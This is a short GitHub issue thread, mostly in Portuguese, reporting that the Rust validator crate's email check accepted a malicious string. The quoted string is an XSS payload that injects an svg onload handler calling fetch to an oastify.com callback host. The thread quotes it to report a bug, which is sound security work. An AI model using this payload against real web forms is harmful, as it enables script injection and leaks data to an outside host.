### ISSUE TITLE
Falha ao validar Email

### ISSUE THREAD

**Issue by soucosmo** [Keats/validator#255]
Hoje, aconteceu um caso estranho, foi imputado um email em nosso formulário que usa #[validate(email)]

Minha struct:
use validator::{Validate};
use serde::Deserialize;

#[derive(Validate, Deserialize, Debug)]
pub struct ContatoDTO {
    #[validate(email)]
    pub email: String,
}

Essa string está sendo aceita como um email válido(precisa **escapar** com \ pra testar):
**'"><svg/onload=fetch//bjy28dnq2pk9er9c089puylrbihb51ttjhb45su\.oastify.com><br>**

**Comment by pintariching** [comment]
Could you edit this issue to be in english please?
